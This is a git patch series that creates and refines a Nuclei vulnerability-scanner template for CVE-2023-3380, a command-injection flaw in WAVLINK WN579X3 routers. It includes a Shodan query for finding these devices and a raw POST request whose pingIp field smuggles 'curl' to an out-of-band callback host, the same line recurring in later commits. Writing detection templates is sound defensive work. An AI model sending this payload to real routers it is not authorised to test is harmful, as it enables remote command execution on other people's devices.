From c92efd11f524d68d05d1217d613ad38b7e26eeb9 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 28 May 2024 16:53:38 +0530
Subject: [PATCH 1/4] Create CVE-2023-3380.yaml
---
http/cves/2023/CVE-2023-3380.yaml | 60 +++++++++++++++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-3380.yaml
diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml
new file mode 100644
index 0000000000..6d59b87411
--- /dev/null
+++ b/http/cves/2023/CVE-2023-3380.yaml
@@ -0,0 +1,60 @@
+id: CVE-2023-3380
+
+info:
+ name: WAVLINK WN579X3 - Remote Command Execution
+ author: pussycat0x
+ severity: critical
+ description: |
+ Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
+ reference:
+ - https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
+ - https://vuldb.com/?ctiid.232236
+ - https://vuldb.com/?id.232236
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-3380
+ cwe-id: CWE-74
+ epss-score: 0.00064
+ epss-percentile: 0.26519
+ cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ vendor: wavlink
+ product: wn579x3_firmware
+ shodan-query: http.html:"Wavlink"
+ tags: cve,cve2023,wavlink
+
+flow: http(1) && http(2)
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: word
+ words:
+ - "images/WAVLINK-logo.png"
+ - "
Wi-Fi APP Login"
+ condition: and
+
+ - raw:
+ - |
+ POST /cgi-bin/adm.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{RootURL}}/ping.shtml?r=32723
+
+ page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 200
From 06c7275753d19d0f2302f03190f3c2cbc6a0b925 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 28 May 2024 22:07:10 +0530
Subject: [PATCH 2/4] lint -fix
---
http/cves/2023/CVE-2023-3380.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml
index 6d59b87411..e78e68b920 100644
--- a/http/cves/2023/CVE-2023-3380.yaml
+++ b/http/cves/2023/CVE-2023-3380.yaml
@@ -22,7 +22,7 @@ info:
vendor: wavlink
product: wn579x3_firmware
shodan-query: http.html:"Wavlink"
- tags: cve,cve2023,wavlink
+ tags: cve,cve2023,wavlink
flow: http(1) && http(2)
@@ -46,7 +46,7 @@ http:
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/ping.shtml?r=32723
- page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
+ page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
matchers-condition: and
matchers:
From 63b01a5682ea46d9c7d9fa8356c87caf8316579a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 25 Jun 2024 13:14:59 +0530
Subject: [PATCH 3/4] added internal: true
---
http/cves/2023/CVE-2023-3380.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml
index e78e68b920..b0d6fbb189 100644
--- a/http/cves/2023/CVE-2023-3380.yaml
+++ b/http/cves/2023/CVE-2023-3380.yaml
@@ -37,6 +37,7 @@ http:
- "images/WAVLINK-logo.png"
- "Wi-Fi APP Login"
condition: and
+ internal: true
- raw:
- |
From 73694e1f11528440913e7351cdd76b9899390ca5 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 3 Jul 2024 16:03:07 +0530
Subject: [PATCH 4/4] Update CVE-2023-3380.yaml
---
http/cves/2023/CVE-2023-3380.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml
index b0d6fbb189..506f1a8eb0 100644
--- a/http/cves/2023/CVE-2023-3380.yaml
+++ b/http/cves/2023/CVE-2023-3380.yaml
@@ -22,7 +22,7 @@ info:
vendor: wavlink
product: wn579x3_firmware
shodan-query: http.html:"Wavlink"
- tags: cve,cve2023,wavlink
+ tags: cve,cve2023,wavlink,rce
flow: http(1) && http(2)
@@ -45,7 +45,7 @@ http:
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
- Referer: {{RootURL}}/ping.shtml?r=32723
+ Referer: {{RootURL}}/ping.shtml
page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}